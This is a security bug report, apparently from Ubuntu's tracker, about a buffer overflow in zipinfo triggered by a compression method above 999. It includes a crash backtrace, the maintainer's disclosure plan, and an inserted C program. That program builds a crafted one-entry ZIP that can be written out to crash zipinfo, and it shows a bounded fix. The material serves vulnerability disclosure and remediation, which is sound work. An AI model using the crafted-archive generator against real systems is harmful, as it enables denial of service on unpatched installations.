Buffer Overflow in ZipInfo
Affects | Status | Importance | Assigned to | Milestone
---|---|---|---|---
unzip (Ubuntu) | Fix Released | Low | Unassigned |
Bug Description
Hello,
I am a security consultant and recently discovered this during some fuzzing exercises.
A buffer overflow occurs in zipinfo (part of the unzip package) when the compression method in the central directory file header is greater than 999:
user@lab:~$ lsb_release -rd
Description: Ubuntu 16.04.1 LTS
Release: 16.04
user@lab:~$ apt-cache policy unzip
unzip:
Installed: 6.0-20ubuntu1
Candidate: 6.0-20ubuntu1
Version table:
*** 6.0-20ubuntu1 500
500 http://
100 /var/lib/
Here is an example output:
user@lab:~$ zipinfo PoC.zip
Archive: PoC.zip
Zip file size: 154 bytes, number of entries: 1
*** buffer overflow detected ***: zipinfo terminated
======= Backtrace: =========
/lib/x86_
/lib/x86_
/lib/x86_
/lib/x86_
/lib/x86_
/lib/x86_
/lib/x86_
/lib/x86_
zipinfo[0x41729b]
zipinfo[0x41144a]
zipinfo[0x411bdf]
zipinfo[0x404191]
/lib/x86_
zipinfo[0x401fa9]
======= Memory map: ========
00400000-00427000 r-xp 00000000 08:01 9176785 /usr/bin/zipinfo
00626000-00627000 r--p 00026000 08:01 9176785 /usr/bin/zipinfo
00627000-00628000 rw-p 00027000 08:01 9176785 /usr/bin/zipinfo
00628000-0071a000 rw-p 00000000 00:00 0
0207b000-0209c000 rw-p 00000000 00:00 0 [heap]
7f7feda5b000-
7f7feda71000-
7f7fedc70000-
7f7fedc71000-
7f7fedf49000-
7f7fee108000-
7f7fee308000-
7f7fee30c000-
7f7fee30e000-
7f7fee312000-
7f7fee321000-
7f7fee520000-
7f7fee521000-
7f7fee522000-
7f7fee729000-
7f7fee744000-
7f7fee747000-
7f7fee748000-
7f7fee749000-
7fffad5d3000-
7fffad5f8000-
7fffad5fa000-
ffffffffff60000
I look forward to hearing from you,
Alexis
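The report above gives the trigger (a central-directory compression method above 999) but not the PoC itself. The following is an added example, not the reporter's PoC and not Info-ZIP's code: it builds a minimal one-entry archive with an arbitrary method value, parses the central directory back with bounds checks, and contrasts an assumed vulnerable pattern (a 5-byte buffer sized for "u" plus three digits, the sizing that matches the "> 999" boundary) with a bounded formatter. The 5-byte buffer, the "u%03u" format and the function names are assumptions for illustration; the overflow is measured rather than performed, so the program is safe to run.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example, not Info-ZIP's code. Builds a one-entry ZIP whose central
 * directory carries an arbitrary compression method, reads it back, and
 * contrasts an assumed "u%03u" formatter sized for three digits (the sizing
 * that matches the "> 999" trigger in the report) with a bounded one. */

static void put16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }
static void put32(uint8_t *p, uint32_t v) { put16(p, (uint16_t)v); put16(p + 2, (uint16_t)(v >> 16)); }
static uint16_t get16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t get32(const uint8_t *p) { return get16(p) | ((uint32_t)get16(p + 2) << 16); }

#define SIG_LFH  0x04034b50u   /* local file header */
#define SIG_CDH  0x02014b50u   /* central directory file header */
#define SIG_EOCD 0x06054b50u   /* end of central directory record */
#define NAME     "a"           /* constructed sample entry: an empty stored file */
#define NAME_LEN 1

/* Write local header, central directory header and EOCD for one empty entry.
 * Only the two method fields carry `method`; everything else stays minimal. */
size_t build_zip(uint8_t *out, size_t cap, uint16_t method) {
    const size_t lfh = 30 + NAME_LEN, cdh = 46 + NAME_LEN, eocd = 22;
    if (cap < lfh + cdh + eocd) return 0;
    memset(out, 0, lfh + cdh + eocd);
    uint8_t *p = out;
    put32(p, SIG_LFH);  put16(p + 4, 20); put16(p + 8, method);
    put16(p + 26, NAME_LEN); memcpy(p + 30, NAME, NAME_LEN);
    p += lfh;
    put32(p, SIG_CDH);  put16(p + 4, 20); put16(p + 6, 20); put16(p + 10, method);
    put16(p + 28, NAME_LEN); put32(p + 42, 0); memcpy(p + 46, NAME, NAME_LEN);
    p += cdh;
    put32(p, SIG_EOCD); put16(p + 8, 1); put16(p + 10, 1);
    put32(p + 12, (uint32_t)cdh); put32(p + 16, (uint32_t)lfh);
    return lfh + cdh + eocd;
}

/* Find the EOCD (scanning back over an optional comment), bounds-check the
 * central directory it points at, and return the first entry's method. */
int read_first_method(const uint8_t *zip, size_t len, uint16_t *method) {
    if (len < 22) return -1;
    size_t stop = len - 22 > 65535 ? len - 22 - 65535 : 0;
    for (size_t i = len - 22;; i--) {
        if (get32(zip + i) == SIG_EOCD) {
            uint32_t cd_size = get32(zip + i + 12), cd_off = get32(zip + i + 16);
            if (get16(zip + i + 10) == 0) return -1;                  /* no entries */
            if (cd_off > i || cd_size > i - cd_off || cd_size < 46) return -1;
            if (get32(zip + cd_off) != SIG_CDH) return -1;
            *method = get16(zip + cd_off + 10);
            return 0;
        }
        if (i == stop) return -1;
    }
}

#define METHBUF_SIZE 5   /* assumed: "u" + three digits + NUL, i.e. exactly "u999" */

/* Bytes the naive sprintf(buf, "u%03u", m) would write, NUL included. Measured
 * into a wide scratch buffer so the measurement itself cannot overflow. */
int naive_bytes_written(uint16_t method) {
    char scratch[16];
    return snprintf(scratch, sizeof scratch, "u%03u", method) + 1;
}

int naive_overflows(uint16_t method) { return naive_bytes_written(method) > METHBUF_SIZE; }

/* Hardened form: bounded write, and a value that does not fit is reported
 * instead of silently truncated. A 16-bit field needs at most "u65535" + NUL. */
int format_method_safe(char *out, size_t outsz, uint16_t method) {
    int n = snprintf(out, outsz, "u%u", method);
    return (n < 0 || (size_t)n >= outsz) ? -1 : n;
}

/* Build an archive with `method` and parse it back; -1 if either step fails. */
int roundtrip_method(uint16_t method) {
    uint8_t zip[128];
    uint16_t m;
    size_t n = build_zip(zip, sizeof zip, method);
    if (n == 0 || read_first_method(zip, n, &m) != 0) return -1;
    return m;
}

int main(int argc, char **argv) {
    uint8_t zip[128];
    char buf[8];
    uint16_t trigger = 1000;   /* smallest value past the "> 999" boundary in the report */
    size_t n = build_zip(zip, sizeof zip, trigger);
    printf("archive: %zu bytes, parsed method %d\n", n, roundtrip_method(trigger));
    printf("naive u%%03u writes %d bytes into %d: %s\n", naive_bytes_written(trigger),
           METHBUF_SIZE, naive_overflows(trigger) ? "OVERFLOW" : "ok");
    printf("bounded: %s\n", format_method_safe(buf, sizeof buf, trigger) < 0 ? "does not fit" : buf);
    if (argc > 1) {            /* optionally write the archive out to feed to zipinfo */
        FILE *f = fopen(argv[1], "wb");
        if (f) { fwrite(zip, 1, n, f); fclose(f); }
    }
    return 0;
}
```

Run with a path argument to write the 100-byte archive to disk; 999 is the last value that fits the three-digit buffer, and every value from 1000 up to the field maximum of 65535 writes past it by one to two bytes, which is why the report's condition reads "greater than 999" rather than a single magic value. The bounded formatter sizes the destination for the field's full range (7 bytes) and checks snprintf's return value, which is the fix pattern a reviewer would want regardless of where the real buffer sits.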
Changed in unzip (Ubuntu):
importance: Undecided → Low
information type: Private Security → Public Security
Hi Alexis - Thanks for the bug report.
I can verify the issue that you have reported. After some research, I've determined it is very similar to, but different from, an older unzip -l crasher reported on oss-security:
http://www.openwall.com/lists/oss-security/2014/11/03/5
Your PoC also happens to trigger that issue in unzip -l but they crash in different areas of the unzip codebase.
Since there are a number of similar unzip issues that never received CVEs or fixes from around 11-2014, I plan to make this issue public and forward the report to the oss-security list early Monday (I'd prefer to avoid reporting an issue at the end of the day on a Friday).
I'd like to credit you for the issue. Would you mind sharing your first and last name so that I can include it in my email report? Thanks again!